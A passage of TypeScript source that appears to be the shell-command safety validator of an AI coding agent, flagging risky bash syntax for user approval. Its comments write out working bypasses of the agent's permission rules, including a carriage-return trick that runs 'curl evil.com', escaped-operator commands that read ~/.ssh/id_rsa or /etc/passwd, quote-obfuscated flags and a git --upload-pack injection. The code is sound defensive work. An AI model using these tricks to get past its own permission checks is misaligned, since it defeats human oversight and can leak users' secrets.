logEvent('tengu_bash_security_check_triggered', {880 checkId: BASH_SECURITY_CHECK_IDS.DANGEROUS_PATTERNS_INPUT_REDIRECTION,881 subId: 1,882 })883 return {884 behavior: 'ask',885 message:886 'Command contains input redirection (<) which could read sensitive files',887 }888 }889890 if (/>/.test(fullyUnquotedContent)) {891 logEvent('tengu_bash_security_check_triggered', {892 checkId: BASH_SECURITY_CHECK_IDS.DANGEROUS_PATTERNS_OUTPUT_REDIRECTION,893 subId: 1,894 })895 return {896 behavior: 'ask',897 message:898 'Command contains output redirection (>) which could write to arbitrary files',899 }900 }901902 return { behavior: 'passthrough', message: 'No redirections' }903}904905function validateNewlines(context: ValidationContext): PermissionResult {906 // Use fullyUnquotedPreStrip (before stripSafeRedirections) to prevent bypasses907 // where stripping `>/dev/null` creates a phantom backslash-newline continuation.908 // E.g., `cmd \>/dev/null\nwhoami` → after stripping becomes `cmd \\nwhoami`909 // which looks like a safe continuation but actually hides a second command.910 const { fullyUnquotedPreStrip } = context911912 // Check for newlines in unquoted content913 if (!/[\n\r]/.test(fullyUnquotedPreStrip)) {914 return { behavior: 'passthrough', message: 'No newlines' }915 }916917 // Flag any newline/CR followed by non-whitespace, EXCEPT backslash-newline918 // continuations at word boundaries. In bash, `\<newline>` is a line919 // continuation (both chars removed), which is safe when the backslash920 // follows whitespace (e.g., `cmd \<newline>--flag`). Mid-word continuations921 // like `tr\<newline>aceroute` are still flagged because they can hide922 // dangerous command names from allowlist checks.923 // eslint-disable-next-line custom-rules/no-lookbehind-regex -- .test() + gated by /[\n\r]/.test() above924 const looksLikeCommand = /(?<![\s]\\)[\n\r]\s*\S/.test(fullyUnquotedPreStrip)925 if (looksLikeCommand) {926 logEvent('tengu_bash_security_check_triggered', {927 checkId: BASH_SECURITY_CHECK_IDS.NEWLINES,928 subId: 1,929 })930 return {931 behavior: 'ask',932 message:933 'Command contains newlines that could separate multiple commands',934 }935 }936937 return {938 behavior: 'passthrough',939 message: 'Newlines appear to be within data',940 }941}942943/**944 * SECURITY: Carriage return (\r, 0x0D) IS a misparsing concern, unlike LF.945 *946 * Parser differential:947 * - shell-quote's BAREWORD regex uses `[^\s...]` — JS `\s` INCLUDES \r, so948 * shell-quote treats CR as a token boundary. `TZ=UTC\recho` tokenizes as949 * TWO tokens: ['TZ=UTC', 'echo']. splitCommand joins with space →950 * 'TZ=UTC echo curl evil.com'.951 * - bash's default IFS = $' \t\n' — CR is NOT in IFS. bash sees952 * `TZ=UTC\recho` as ONE word → env assignment TZ='UTC\recho' (CR byte953 * inside value), then `curl` is the command.954 *955 * Attack: `TZ=UTC\recho curl evil.com` with Bash(echo:*)956 * validator: splitCommand collapses CR→space → 'TZ=UTC echo curl evil.com'957 * → stripSafeWrappers: TZ=UTC stripped → 'echo curl evil.com' matches rule958 * bash: executes `curl evil.com`959 *960 * validateNewlines catches this but is in nonMisparsingValidators (LF is961 * correctly handled by both parsers). This validator is NOT in962 * nonMisparsingValidators — its ask result gets isBashSecurityCheckForMisparsing963 * and blocks at the bashPermissions gate.964 *965 * Checks originalCommand (not fullyUnquotedPreStrip) because CR inside single966 * quotes is ALSO a misparsing concern for the same reason: shell-quote's `\s`967 * still tokenizes it, but bash treats it as literal. Block ALL unquoted-or-SQ CR.968 * Only exception: CR inside DOUBLE quotes where bash also treats it as data969 * and shell-quote preserves the token (no split).970 */971function validateCarriageReturn(context: ValidationContext): PermissionResult {972 const { originalCommand } = context973974 if (!originalCommand.includes('\r')) {975 return { behavior: 'passthrough', message: 'No carriage return' }976 }977978 // Check if CR appears outside double quotes. CR outside DQ (including inside979 // SQ and unquoted) causes the shell-quote/bash tokenization differential.980 let inSingleQuote = false981 let inDoubleQuote = false982 let escaped = false983 for (let i = 0; i < originalCommand.length; i++) {984 const c = originalCommand[i]985 if (escaped) {986 escaped = false987 continue988 }989 if (c === '\\' && !inSingleQuote) {990 escaped = true991 continue992 }993 if (c === "'" && !inDoubleQuote) {994 inSingleQuote = !inSingleQuote995 continue996 }997 if (c === '"' && !inSingleQuote) {998 inDoubleQuote = !inDoubleQuote999 continue1000 }1001 if (c === '\r' && !inDoubleQuote) {1002 logEvent('tengu_bash_security_check_triggered', {1003 checkId: BASH_SECURITY_CHECK_IDS.NEWLINES,1004 subId: 2,1005 })1006 return {1007 behavior: 'ask',1008 message:1009 'Command contains carriage return (\\r) which shell-quote and bash tokenize differently',1010 }1011 }1012 }10131014 return { behavior: 'passthrough', message: 'CR only inside double quotes' }1015}10161017function validateIFSInjection(context: ValidationContext): PermissionResult {1018 const { originalCommand } = context10191020 // Detect any usage of IFS variable which could be used to bypass regex validation1021 // Check for $IFS and ${...IFS...} patterns (including parameter expansions like ${IFS:0:1}, ${#IFS}, etc.)1022 // Using ${[^}]*IFS to catch all parameter expansion variations with IFS1023 if (/\$IFS|\$\{[^}]*IFS/.test(originalCommand)) {1024 logEvent('tengu_bash_security_check_triggered', {1025 checkId: BASH_SECURITY_CHECK_IDS.IFS_INJECTION,1026 subId: 1,1027 })1028 return {1029 behavior: 'ask',1030 message:1031 'Command contains IFS variable usage which could bypass security validation',1032 }1033 }10341035 return { behavior: 'passthrough', message: 'No IFS injection detected' }1036}10371038// Additional hardening against reading environment variables via /proc filesystem.1039// Path validation typically blocks /proc access, but this provides defense-in-depth.1040// Environment files in /proc can expose sensitive data like API keys and secrets.1041function validateProcEnvironAccess(1042 context: ValidationContext,1043): PermissionResult {1044 const { originalCommand } = context10451046 // Check for /proc paths that could expose environment variables1047 // This catches patterns like:1048 // - /proc/self/environ1049 // - /proc/1/environ1050 // - /proc/*/environ (with any PID)1051 if (/\/proc\/.*\/environ/.test(originalCommand)) {1052 logEvent('tengu_bash_security_check_triggered', {1053 checkId: BASH_SECURITY_CHECK_IDS.PROC_ENVIRON_ACCESS,1054 subId: 1,1055 })1056 return {1057 behavior: 'ask',1058 message:1059 'Command accesses /proc/*/environ which could expose sensitive environment variables',1060 }1061 }10621063 return {1064 behavior: 'passthrough',1065 message: 'No /proc/environ access detected',1066 }1067}10681069/**1070 * Detects commands with malformed tokens (unbalanced delimiters) combined with1071 * command separators. This catches potential injection patterns where ambiguous1072 * shell syntax could be exploited.1073 *1074 * Security: This check catches the eval bypass discovered in HackerOne review.1075 * When shell-quote parses ambiguous patterns like `echo {"hi":"hi;evil"}`,1076 * it may produce unbalanced tokens (e.g., `{hi:"hi`). Combined with command1077 * separators, this can lead to unintended command execution via eval re-parsing.1078 *1079 * By forcing user approval for these patterns, we ensure the user sees exactly1080 * what will be executed before approving.1081 */1082function validateMalformedTokenInjection(1083 context: ValidationContext,1084): PermissionResult {1085 const { originalCommand } = context10861087 const parseResult = tryParseShellCommand(originalCommand)1088 if (!parseResult.success) {1089 // Parse failed - this is handled elsewhere (bashToolHasPermission checks this)1090 return {1091 behavior: 'passthrough',1092 message: 'Parse failed, handled elsewhere',1093 }1094 }10951096 const parsed = parseResult.tokens10971098 // Check for command separators (;, &&, ||)1099 const hasCommandSeparator = parsed.some(1100 entry =>1101 typeof entry === 'object' &&1102 entry !== null &&1103 'op' in entry &&1104 (entry.op === ';' || entry.op === '&&' || entry.op === '||'),1105 )11061107 if (!hasCommandSeparator) {1108 return { behavior: 'passthrough', message: 'No command separators' }1109 }11101111 // Check for malformed tokens (unbalanced delimiters)1112 if (hasMalformedTokens(originalCommand, parsed)) {1113 logEvent('tengu_bash_security_check_triggered', {1114 checkId: BASH_SECURITY_CHECK_IDS.MALFORMED_TOKEN_INJECTION,1115 subId: 1,1116 })1117 return {1118 behavior: 'ask',1119 message:1120 'Command contains ambiguous syntax with command separators that could be misinterpreted',1121 }1122 }11231124 return {1125 behavior: 'passthrough',1126 message: 'No malformed token injection detected',1127 }1128}11291130function validateObfuscatedFlags(context: ValidationContext): PermissionResult {1131 // Block shell quoting bypass patterns used to circumvent negative lookaheads we use in our regexes to block known dangerous flags11321133 const { originalCommand, baseCommand } = context11341135 // Echo is safe for obfuscated flags, BUT only for simple echo commands.1136 // For compound commands (with |, &, ;), we need to check the whole command1137 // because the dangerous ANSI-C quoting might be after the operator.1138 const hasShellOperators = /[|&;]/.test(originalCommand)1139 if (baseCommand === 'echo' && !hasShellOperators) {1140 return {1141 behavior: 'passthrough',1142 message: 'echo command is safe and has no dangerous flags',1143 }1144 }11451146 // COMPREHENSIVE OBFUSCATION DETECTION1147 // These checks catch various ways to hide flags using shell quoting11481149 // 1. Block ANSI-C quoting ($'...') - can encode any character via escape sequences1150 // Simple pattern that matches $'...' anywhere. This correctly handles:1151 // - grep '$' file => no match ($ is regex anchor inside quotes, no $'...' structure)1152 // - 'test'$'-exec' => match (quote concatenation with ANSI-C)1153 // - Zero-width space and other invisible chars => match1154 // The pattern requires $' followed by content (can be empty) followed by closing '1155 if (/\$'[^']*'/.test(originalCommand)) {1156 logEvent('tengu_bash_security_check_triggered', {1157 checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,1158 subId: 5,1159 })1160 return {1161 behavior: 'ask',1162 message: 'Command contains ANSI-C quoting which can hide characters',1163 }1164 }11651166 // 2. Block locale quoting ($"...") - can also use escape sequences1167 // Same simple pattern as ANSI-C quoting above1168 if (/\$"[^"]*"/.test(originalCommand)) {1169 logEvent('tengu_bash_security_check_triggered', {1170 checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,1171 subId: 6,1172 })1173 return {1174 behavior: 'ask',1175 message: 'Command contains locale quoting which can hide characters',1176 }1177 }11781179 // 3. Block empty ANSI-C or locale quotes followed by dash1180 // $''-exec or $""-exec1181 if (/\$['"]{2}\s*-/.test(originalCommand)) {1182 logEvent('tengu_bash_security_check_triggered', {1183 checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,1184 subId: 9,1185 })1186 return {1187 behavior: 'ask',1188 message:1189 'Command contains empty special quotes before dash (potential bypass)',1190 }1191 }11921193 // 4. Block ANY sequence of empty quotes followed by dash1194 // This catches: ''- ""- ''""- ""''- ''""''- etc.1195 // The pattern looks for one or more empty quote pairs followed by optional whitespace and dash1196 if (/(?:^|\s)(?:''|"")+\s*-/.test(originalCommand)) {1197 logEvent('tengu_bash_security_check_triggered', {1198 checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,1199 subId: 7,1200 })1201 return {1202 behavior: 'ask',1203 message: 'Command contains empty quotes before dash (potential bypass)',1204 }1205 }12061207 // 4b. SECURITY: Block homogeneous empty quote pair(s) immediately adjacent1208 // to a quoted dash. Patterns like `"""-f"` (empty `""` + quoted `"-f"`)1209 // concatenate in bash to `-f` but slip past all the above checks:1210 // - Regex (4) above: `(?:''|"")+\s*-` matches `""` pair, then expects1211 // optional space and dash — but finds a third `"` instead. No match.1212 // - Quote-content scanner (below): Sees the first `""` pair with empty1213 // content (doesn't start with dash). The third `"` opens a new quoted1214 // region handled by the main quote-state tracker.1215 // - Quote-state tracker: `""` toggles inDoubleQuote on/off; third `"`1216 // opens it again. The `-` inside `"-f"` is INSIDE quotes → skipped.1217 // - Flag scanner: Looks for `\s` before `-`. The `-` is preceded by `"`.1218 // - fullyUnquotedContent: Both `""` and `"-f"` get stripped.1219 //1220 // In bash, `"""-f"` = empty string + string "-f" = `-f`. This bypass works1221 // for ANY dangerous-flag check (jq -f, find -exec, fc -e) with a matching1222 // prefix permission (Bash(jq:*), Bash(find:*)).1223 //1224 // The regex `(?:""|'')+['"]-` matches:1225 // - One or more HOMOGENEOUS empty pairs (`""` or `''`) — the concatenation1226 // point where bash joins the empty string to the flag.1227 // - Immediately followed by ANY quote char — opens the flag-quoted region.1228 // - Immediately followed by `-` — the obfuscated flag.1229 //1230 // POSITION-AGNOSTIC: We do NOT require word-start (`(?:^|\s)`) because1231 // prefixes like `$x"""-f"` (unset/empty variable) concatenate the same way.1232 // The homogeneous-empty-pair requirement filters out the `'"'"'` idiom1233 // (no homogeneous empty pair — it's close, double-quoted-content, open).1234 //1235 // FALSE POSITIVE: Matches `echo '"""-f" text'` (pattern inside single-quoted1236 // string). Extremely rare (requires echoing the literal attack). Acceptable.1237 if (/(?:""|'')+['"]-/.test(originalCommand)) {1238 logEvent('tengu_bash_security_check_triggered', {1239 checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,1240 subId: 10,1241 })1242 return {1243 behavior: 'ask',1244 message:1245 'Command contains empty quote pair adjacent to quoted dash (potential flag obfuscation)',1246 }1247 }12481249 // 4c. SECURITY: Also block 3+ consecutive quotes at word start even without1250 // an immediate dash. Broader safety net for multi-quote obfuscation patterns1251 // not enumerated above (e.g., `"""x"-f` where content between quotes shifts1252 // the dash position). Legitimate commands never need `"""x"` when `"x"` works.1253 if (/(?:^|\s)['"]{3,}/.test(originalCommand)) {1254 logEvent('tengu_bash_security_check_triggered', {1255 checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,1256 subId: 11,1257 })1258 return {1259 behavior: 'ask',1260 message:1261 'Command contains consecutive quote characters at word start (potential obfuscation)',1262 }1263 }12641265 // Track quote state to avoid false positives for flags inside quoted strings1266 let inSingleQuote = false1267 let inDoubleQuote = false1268 let escaped = false12691270 for (let i = 0; i < originalCommand.length - 1; i++) {1271 const currentChar = originalCommand[i]1272 const nextChar = originalCommand[i + 1]12731274 // Update quote state1275 if (escaped) {1276 escaped = false1277 continue1278 }12791280 // SECURITY: Only treat backslash as escape OUTSIDE single quotes. In bash,1281 // `\` inside `'...'` is LITERAL. Without this guard, `'\'` desyncs the1282 // quote tracker: `\` sets escaped=true, closing `'` is consumed by the1283 // escaped-skip above instead of toggling inSingleQuote. Parser stays in1284 // single-quote mode, and the `if (inSingleQuote || inDoubleQuote) continue`1285 // at line ~1121 skips ALL subsequent flag detection for the rest of the1286 // command. Example: `jq '\' "-f" evil` — bash gets `-f` arg, but desynced1287 // parser thinks ` "-f" evil` is inside quotes → flag detection bypassed.1288 // Defense-in-depth: hasShellQuoteSingleQuoteBug catches `'\'` patterns at1289 // line ~1856 before this runs. But we fix the tracker for consistency with1290 // the CORRECT implementations elsewhere in this file (hasBackslashEscaped*,1291 // extractQuotedContent) which all guard with `!inSingleQuote`.1292 if (currentChar === '\\' && !inSingleQuote) {1293 escaped = true1294 continue1295 }12961297 if (currentChar === "'" && !inDoubleQuote) {1298 inSingleQuote = !inSingleQuote1299 continue1300 }13011302 if (currentChar === '"' && !inSingleQuote) {1303 inDoubleQuote = !inDoubleQuote1304 continue1305 }13061307 // Only look for flags when not inside quoted strings1308 // This prevents false positives like: make test TEST="file.py -v"1309 if (inSingleQuote || inDoubleQuote) {1310 continue1311 }13121313 // Look for whitespace followed by quote that contains a dash (potential flag obfuscation)1314 // SECURITY: Block ANY quoted content starting with dash - err on side of safety1315 // Catches: "-"exec, "-file", "--flag", '-'output, etc.1316 // Users can approve manually if legitimate (e.g., find . -name "-file")1317 if (1318 currentChar &&1319 nextChar &&1320 /\s/.test(currentChar) &&1321 /['"`]/.test(nextChar)1322 ) {1323 const quoteChar = nextChar1324 let j = i + 2 // Start after the opening quote1325 let insideQuote = ''13261327 // Collect content inside the quote1328 while (j < originalCommand.length && originalCommand[j] !== quoteChar) {1329 insideQuote += originalCommand[j]!1330 j++1331 }13321333 // If we found a closing quote and the content looks like an obfuscated flag, block it.1334 // Three attack patterns to catch:1335 // 1. Flag name inside quotes: "--flag", "-exec", "-X" (dashes + letters inside)1336 // 2. Split-quote flag: "-"exec, "--"output (dashes inside, letters continue after quote)1337 // 3. Chained quotes: "-""exec" (dashes in first quote, second quote contains letters)1338 // Pure-dash strings like "---" or "--" followed by whitespace/separator are separators,1339 // not flags, and should not trigger this check.1340 const charAfterQuote = originalCommand[j + 1]1341 // Inside double quotes, $VAR and `cmd` expand at runtime, so "-$VAR" can1342 // become -exec. Blocking $ and ` here over-blocks single-quoted literals1343 // like grep '-$' (where $ is literal), but main's startsWith('-') already1344 // blocked those — this restores status quo, not a new false positive.1345 // Brace expansion ({) does NOT happen inside quotes, so { is not needed here.1346 const hasFlagCharsInside = /^-+[a-zA-Z0-9$`]/.test(insideQuote)1347 // Characters that can continue a flag after a closing quote. This catches:1348 // a-zA-Z0-9: "-"exec → -exec (direct concatenation)1349 // \\: "-"\exec → -exec (backslash escape is stripped)1350 // -: "-"-output → --output (extra dashes)1351 // {: "-"{exec,delete} → -exec -delete (brace expansion)1352 // $: "-"$VAR → -exec when VAR=exec (variable expansion)1353 // `: "-"`echo exec` → -exec (command substitution)1354 // Note: glob chars (*?[) are omitted — they require attacker-controlled1355 // filenames in CWD to exploit, and blocking them would break patterns1356 // like `ls -- "-"*` for listing files that start with dash.1357 const FLAG_CONTINUATION_CHARS = /[a-zA-Z0-9\\${`-]/1358 const hasFlagCharsContinuing =1359 /^-+$/.test(insideQuote) &&1360 charAfterQuote !== undefined &&1361 FLAG_CONTINUATION_CHARS.test(charAfterQuote)1362 // Handle adjacent quote chaining: "-""exec" or "-""-"exec or """-"exec concatenates1363 // to -exec in shell. Follow the chain of adjacent quoted segments until1364 // we find one containing an alphanumeric char or hit a non-quote boundary.1365 // Also handles empty prefix quotes: """-"exec where "" is followed by "-"exec1366 // The combined segments form a flag if they contain dash(es) followed by alphanumerics.1367 const hasFlagCharsInNextQuote =1368 // Trigger when: first segment is only dashes OR empty (could be prefix for flag)1369 (insideQuote === '' || /^-+$/.test(insideQuote)) &&1370 charAfterQuote !== undefined &&1371 /['"`]/.test(charAfterQuote) &&1372 (() => {1373 let pos = j + 1 // Start at charAfterQuote (an opening quote)1374 let combinedContent = insideQuote // Track what the shell will see1375 while (1376 pos < originalCommand.length &&1377 /['"`]/.test(originalCommand[pos]!)1378 ) {1379 const segQuote = originalCommand[pos]!1380 let end = pos + 11381 while (1382 end < originalCommand.length &&1383 originalCommand[end] !== segQuote1384 ) {1385 end++1386 }1387 const segment = originalCommand.slice(pos + 1, end)1388 combinedContent += segment13891390 // Check if combined content so far forms a flag pattern.1391 // Include $ and ` for in-quote expansion: "-""$VAR" → -exec1392 if (/^-+[a-zA-Z0-9$`]/.test(combinedContent)) return true13931394 // If this segment has alphanumeric/expansion and we already have dashes,1395 // it's a flag. Catches "-""$*" where segment='$*' has no alnum but1396 // expands to positional params at runtime.1397 // Guard against segment.length === 0: slice(0, -0) → slice(0, 0) → ''.1398 const priorContent =1399 segment.length > 01400 ? combinedContent.slice(0, -segment.length)1401 : combinedContent1402 if (/^-+$/.test(priorContent)) {1403 if (/[a-zA-Z0-9$`]/.test(segment)) return true1404 }14051406 if (end >= originalCommand.length) break // Unclosed quote1407 pos = end + 1 // Move past closing quote to check next segment1408 }1409 // Also check the unquoted char at the end of the chain1410 if (1411 pos < originalCommand.length &&1412 FLAG_CONTINUATION_CHARS.test(originalCommand[pos]!)1413 ) {1414 // If we have dashes in combined content, the trailing char completes a flag1415 if (/^-+$/.test(combinedContent) || combinedContent === '') {1416 // Check if we're about to form a flag with the following content1417 const nextChar = originalCommand[pos]!1418 if (nextChar === '-') {1419 // More dashes, could still form a flag1420 return true1421 }1422 if (/[a-zA-Z0-9\\${`]/.test(nextChar) && combinedContent !== '') {1423 // We have dashes and now alphanumeric/expansion follows1424 return true1425 }1426 }1427 // Original check for dashes followed by alphanumeric1428 if (/^-/.test(combinedContent)) {1429 return true1430 }1431 }1432 return false1433 })()1434 if (1435 j < originalCommand.length &&1436 originalCommand[j] === quoteChar &&1437 (hasFlagCharsInside ||1438 hasFlagCharsContinuing ||1439 hasFlagCharsInNextQuote)1440 ) {1441 logEvent('tengu_bash_security_check_triggered', {1442 checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,1443 subId: 4,1444 })1445 return {1446 behavior: 'ask',1447 message: 'Command contains quoted characters in flag names',1448 }1449 }1450 }14511452 // Look for whitespace followed by dash - this starts a flag1453 if (currentChar && nextChar && /\s/.test(currentChar) && nextChar === '-') {1454 let j = i + 1 // Start at the dash1455 let flagContent = ''14561457 // Collect flag content1458 while (j < originalCommand.length) {1459 const flagChar = originalCommand[j]1460 if (!flagChar) break14611462 // End flag content once we hit whitespace or an equals sign1463 if (/[\s=]/.test(flagChar)) {1464 break1465 }1466 // End flag collection if we hit quote followed by non-flag character. This is needed to handle cases like -d"," which should be parsed as just -d1467 if (/['"`]/.test(flagChar)) {1468 // Special case for cut -d flag: the delimiter value can be quoted1469 // Example: cut -d'"' should parse as flag name: -d, value: '"'1470 // Note: We only apply this exception to cut -d specifically to avoid bypasses.1471 // Without this restriction, a command like `find -e"xec"` could be parsed as1472 // flag name: -e, bypassing our blocklist for -exec. By restricting to cut -d,1473 // we allow the legitimate use case while preventing obfuscation attacks on other1474 // commands where quoted flag values could hide dangerous flag names.1475 if (1476 baseCommand === 'cut' &&1477 flagContent === '-d' &&1478 /['"`]/.test(flagChar)1479 ) {1480 // This is cut -d followed by a quoted delimiter - flagContent is already '-d'1481 break1482 }14831484 // Look ahead to see what follows the quote1485 if (j + 1 < originalCommand.length) {1486 const nextFlagChar = originalCommand[j + 1]1487 if (nextFlagChar && !/[a-zA-Z0-9_'"-]/.test(nextFlagChar)) {1488 // Quote followed by something that is clearly not part of a flag, end the parsing1489 break1490 }1491 }1492 }1493 flagContent += flagChar1494 j++1495 }14961497 if (flagContent.includes('"') || flagContent.includes("'")) {1498 logEvent('tengu_bash_security_check_triggered', {1499 checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,1500 subId: 1,1501 })1502 return {1503 behavior: 'ask',1504 message: 'Command contains quoted characters in flag names',1505 }1506 }1507 }1508 }15091510 // Also handle flags that start with quotes: "--"output, '-'-output, etc.1511 // Use fullyUnquotedContent to avoid false positives from legitimate quoted content like echo "---"1512 if (/\s['"`]-/.test(context.fullyUnquotedContent)) {1513 logEvent('tengu_bash_security_check_triggered', {1514 checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,1515 subId: 2,1516 })1517 return {1518 behavior: 'ask',1519 message: 'Command contains quoted characters in flag names',1520 }1521 }15221523 // Also handles cases like ""--output1524 // Use fullyUnquotedContent to avoid false positives from legitimate quoted content1525 if (/['"`]{2}-/.test(context.fullyUnquotedContent)) {1526 logEvent('tengu_bash_security_check_triggered', {1527 checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,1528 subId: 3,1529 })1530 return {1531 behavior: 'ask',1532 message: 'Command contains quoted characters in flag names',1533 }1534 }15351536 return { behavior: 'passthrough', message: 'No obfuscated flags detected' }1537}15381539/**1540 * Detects backslash-escaped whitespace characters (space, tab) outside of quotes.1541 *1542 * In bash, `echo\ test` is a single token (command named "echo test"), but1543 * shell-quote decodes the escape and produces `echo test` (two separate tokens).1544 * This discrepancy allows path traversal attacks like:1545 * echo\ test/../../../usr/bin/touch /tmp/file1546 * which the parser sees as `echo test/.../touch /tmp/file` (an echo command)1547 * but bash resolves as `/usr/bin/touch /tmp/file` (via directory "echo test").1548 */1549function hasBackslashEscapedWhitespace(command: string): boolean {1550 let inSingleQuote = false1551 let inDoubleQuote = false15521553 for (let i = 0; i < command.length; i++) {1554 const char = command[i]15551556 if (char === '\\' && !inSingleQuote) {1557 if (!inDoubleQuote) {1558 const nextChar = command[i + 1]1559 if (nextChar === ' ' || nextChar === '\t') {1560 return true1561 }1562 }1563 // Skip the escaped character (both outside quotes and inside double quotes,1564 // where \\, \", \$, \` are valid escape sequences)1565 i++1566 continue1567 }15681569 if (char === '"' && !inSingleQuote) {1570 inDoubleQuote = !inDoubleQuote1571 continue1572 }15731574 if (char === "'" && !inDoubleQuote) {1575 inSingleQuote = !inSingleQuote1576 continue1577 }1578 }15791580 return false1581}15821583function validateBackslashEscapedWhitespace(1584 context: ValidationContext,1585): PermissionResult {1586 if (hasBackslashEscapedWhitespace(context.originalCommand)) {1587 logEvent('tengu_bash_security_check_triggered', {1588 checkId: BASH_SECURITY_CHECK_IDS.BACKSLASH_ESCAPED_WHITESPACE,1589 })1590 return {1591 behavior: 'ask',1592 message:1593 'Command contains backslash-escaped whitespace that could alter command parsing',1594 }1595 }15961597 return {1598 behavior: 'passthrough',1599 message: 'No backslash-escaped whitespace',1600 }1601}16021603/**1604 * Detects a backslash immediately preceding a shell operator outside of quotes.1605 *1606 * SECURITY: splitCommand normalizes `\;` to a bare `;` in its output string.1607 * When downstream code (checkReadOnlyConstraints, checkPathConstraints, etc.)1608 * re-parses that normalized string, the bare `;` is seen as an operator and1609 * causes a false split. This enables arbitrary file read bypassing path checks:1610 *1611 * cat safe.txt \; echo ~/.ssh/id_rsa1612 *1613 * In bash: ONE cat command reading safe.txt, ;, echo, ~/.ssh/id_rsa as files.1614 * After splitCommand normalizes: "cat safe.txt ; echo ~/.ssh/id_rsa"1615 * Nested re-parse: ["cat safe.txt", "echo ~/.ssh/id_rsa"] — both segments1616 * pass isCommandReadOnly, sensitive path hidden in echo segment is never1617 * validated by path constraints. Auto-allowed. Private key leaked.1618 *1619 * This check flags any \<operator> regardless of backslash parity. Even counts1620 * (\\;) are dangerous in bash (\\ → \, ; separates). Odd counts (\;) are safe1621 * in bash but trigger the double-parse bug above. Both must be flagged.1622 *1623 * Known false positive: `find . -exec cmd {} \;` — users will be prompted once.1624 *1625 * Note: `(` and `)` are NOT in this set — splitCommand preserves `\(` and `\)`1626 * in its output (round-trip safe), so they don't trigger the double-parse bug.1627 * This allows `find . \( -name x -o -name y \)` to pass without false positives.1628 */1629const SHELL_OPERATORS = new Set([';', '|', '&', '<', '>'])16301631function hasBackslashEscapedOperator(command: string): boolean {1632 let inSingleQuote = false1633 let inDoubleQuote = false16341635 for (let i = 0; i < command.length; i++) {1636 const char = command[i]16371638 // SECURITY: Handle backslash FIRST, before quote toggles. In bash, inside1639 // double quotes, `\"` is an escape sequence producing a literal `"` — it1640 // does NOT close the quote. If we process quote toggles first, `\"` inside1641 // `"..."` desyncs the tracker:1642 // - `\` is ignored (gated by !inDoubleQuote)1643 // - `"` toggles inDoubleQuote to FALSE (wrong — bash says still inside)1644 // - next `"` (the real closing quote) toggles BACK to TRUE — locked desync1645 // - subsequent `\;` is missed because !inDoubleQuote is false1646 // Exploit: `tac "x\"y" \; echo ~/.ssh/id_rsa` — bash runs ONE tac reading1647 // all args as files (leaking id_rsa), but desynced tracker misses `\;` and1648 // splitCommand's double-parse normalization "sees" two safe commands.1649 //1650 // Fix structure matches hasBackslashEscapedWhitespace (which was correctly1651 // fixed for this in commit prior to d000dfe84e): backslash check first,1652 // gated only by !inSingleQuote (since backslash IS literal inside '...'),1653 // unconditional i++ to skip the escaped char even inside double quotes.1654 if (char === '\\' && !inSingleQuote) {1655 // Only flag \<operator> when OUTSIDE double quotes (inside double quotes,1656 // operators like ;|&<> are already not special, so \; is harmless there).1657 if (!inDoubleQuote) {1658 const nextChar = command[i + 1]1659 if (nextChar && SHELL_OPERATORS.has(nextChar)) {1660 return true1661 }1662 }1663 // Skip the escaped character unconditionally. Inside double quotes, this1664 // correctly consumes backslash pairs: `"x\\"` → pos 6 (`\`) skips pos 71665 // (`\`), then pos 8 (`"`) toggles inDoubleQuote off correctly. Without1666 // unconditional skip, pos 7 would see `\`, see pos 8 (`"`) as nextChar,1667 // skip it, and the closing quote would NEVER toggle inDoubleQuote —1668 // permanently desyncing and missing subsequent `\;` outside quotes.1669 // Exploit: `cat "x\\" \; echo /etc/passwd` — bash reads /etc/passwd.1670 //1671 // This correctly handles backslash parity: odd-count `\;` (1, 3, 5...)1672 // is flagged (the unpaired `\` before `;` is detected). Even-count `\\;`1673 // (2, 4...) is NOT flagged, which is CORRECT — bash treats `\\` as1674 // literal `\` and `;` as a separator, so splitCommand handles it1675 // normally (no double-parse bug). This matches1676 // hasBackslashEscapedWhitespace line ~1340.1677 i++1678 continue1679 }16801681 // Quote toggles come AFTER backslash handling (backslash already skipped1682 // any escaped quote char, so these toggles only fire on unescaped quotes).1683 if (char === "'" && !inDoubleQuote) {1684 inSingleQuote = !inSingleQuote1685 continue1686 }1687 if (char === '"' && !inSingleQuote) {1688 inDoubleQuote = !inDoubleQuote1689 continue1690 }1691 }16921693 return false1694}16951696function validateBackslashEscapedOperators(1697 context: ValidationContext,1698): PermissionResult {1699 // Tree-sitter path: if tree-sitter confirms no actual operator nodes exist1700 // in the AST, then any \; is just an escaped character in a word argument1701 // (e.g., `find . -exec cmd {} \;`). Skip the expensive regex check.1702 if (context.treeSitter && !context.treeSitter.hasActualOperatorNodes) {1703 return { behavior: 'passthrough', message: 'No operator nodes in AST' }1704 }17051706 if (hasBackslashEscapedOperator(context.originalCommand)) {1707 logEvent('tengu_bash_security_check_triggered', {1708 checkId: BASH_SECURITY_CHECK_IDS.BACKSLASH_ESCAPED_OPERATORS,1709 })1710 return {1711 behavior: 'ask',1712 message:1713 'Command contains a backslash before a shell operator (;, |, &, <, >) which can hide command structure',1714 }1715 }17161717 return {1718 behavior: 'passthrough',1719 message: 'No backslash-escaped operators',1720 }1721}17221723/**1724 * Checks if a character at position `pos` in `content` is escaped by counting1725 * consecutive backslashes before it. An odd number means it's escaped.1726 */1727function isEscapedAtPosition(content: string, pos: number): boolean {1728 let backslashCount = 01729 let i = pos - 11730 while (i >= 0 && content[i] === '\\') {1731 backslashCount++1732 i--1733 }1734 return backslashCount % 2 === 11735}17361737/**1738 * Detects unquoted brace expansion syntax that Bash expands but shell-quote/tree-sitter1739 * treat as literal strings. This parsing discrepancy allows permission bypass:1740 * git ls-remote {--upload-pack="touch /tmp/test",test}1741 * Parser sees one literal arg, but Bash expands to: --upload-pack="touch /tmp/test" test1742 *1743 * Brace expansion has two forms:1744 * 1. Comma-separated: {a,b,c} → a b c1745 * 2. Sequence: {1..5} → 1 2 3 4 51746 *1747 * Both single and double quotes suppress brace expansion in Bash, so we use1748 * fullyUnquotedContent which has both quote types 